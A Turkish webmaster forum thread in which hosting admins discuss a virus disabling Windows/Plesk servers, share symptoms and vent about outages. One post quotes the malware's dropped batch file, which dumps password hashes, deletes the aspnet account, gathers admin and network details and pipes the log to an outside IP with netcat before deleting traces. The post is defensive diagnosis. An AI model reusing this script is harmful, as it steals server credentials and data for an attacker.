İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

Windows sunucu sitelere girince şifre soruyor?

Maverick

0
İyinet Üyesi
Reaction score
1
Hocam sizin maillerle bir işiniz yok sanırım mail enable yi kaldırın dediğinize göre.

CS.GEN.TR

0
İyinet Üyesi
Reaction score
0
demekki :)
Hocam sizin maillerle bir işiniz yok sanırım mail enable yi kaldırın dediğinize göre.

bu arada virus tüm türkiyeyi sanki etkisi altına almış. çoğu plesk kullanıcıları madur durumda. bu nedenle herkes sunucularının yedeklerini alsın

MKB

0
İyinet Üyesi
Reaction score
0
Sunucu yetkilerinizi ayarlamış iseniz sunucunuza birşey olmaz.
Plesk ilk kurulduğu gibi duruyorsa yani apaçık ortada ise herşey o zaman etkilenirsiniz ve şuan için yapılacak kesin bir çözüm bulunmadı.

CS.GEN.TR

0
İyinet Üyesi
Reaction score
0
virus system32 nin altında start.bat oluşturuyor. dosya içeriği;

cd %WINDIR%\system32
gethashes.exe $Local>>Status.log
pack.exe
net user aspnet /delete /y>>status.log
bw.exe>>status.log
net localgroup Administrators >>status.log
del hash.bat
psinfo -d >>status.log
ipconfig/all>>status.log
bot.exe
type status.log|nc 209.196.36.78 53
start cmd /c del status.log
start cmd /c del pack.exe
start cmd /c del unrar.exe
start cmd /c del fix.bat
start cmd /c del _iNDEX.e

mr_cpu

0
İyinet Üyesi
Reaction score
0
arkadaşlar sorun benim server da da var işin garibi servera restaRT çektim ama şimdi ulaşamıyorum da dün 20:00 suları hiç bişey yok tu

MKB

0
İyinet Üyesi
Reaction score
0
Bu virüs bulaşan makinaya restart attığınızda windows açılırken uyarı veriyor ve 3 kere mavi ekran çıkıp 3 kere reset atıyor kendisine ve açıldıktan sonra siteler çalışmaz hale geliyor.

mr_cpu

0
İyinet Üyesi
Reaction score
0
server i bi açsam pazar bu gün dc ye de ulaşamıyorum rezil olcam müşterilere yaa

mr_cpu

0
İyinet Üyesi
Reaction score
0
şimdi açılmazmı giddimi server ve o kadar site :(
pingliyorum hala bişey yok

mr_cpu

0
İyinet Üyesi
Reaction score
0
walla kıyacam paraya alıcam 2 tane 2048 hat kendim vericem hostu hiç olmazsa elimin altında olur siteler bıktım walla kiralayalı 1 ay olmadı sorun sorun sorun kafayı yedim yada kıyacam paraya gidicem amerikaya serveri kırıp dönecem

Ke[R]eM

0
İyinet Üyesi
Reaction score
0
FDC'den sunucu almak zaten bir hata. Reset atarak ayrı bir hata yapmışsınız. 2 tane 2048 alana kadar Metro Ethernet çektirebilirsiniz. Veya Amerika'daki daha kaliteli diğer datacenterlar ile çalışabilirsiniz veya Almanya, Fransa gibi ülkelere yönelebilirsiniz.

salihk

0
İyinet Üyesi
Reaction score
0
sakin ol kardeş bir an önce dc ne ulaşman lazım :)

şu anda bende herhangi bir sorun yok reset atmayım malum banada birşeyler olabilir

mr_cpu

0
İyinet Üyesi
Reaction score
0
siteleri bi kurtarsam gerekirse metor alıcam zaten düşünüyordum evde odanın bi köşesine koycam serverları alan alır almayan kendi bilir ama siteler önemli ya daha birinin dün akşam bitirdim yaaaaa sinirden ağlayacağım neredeyse offff

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5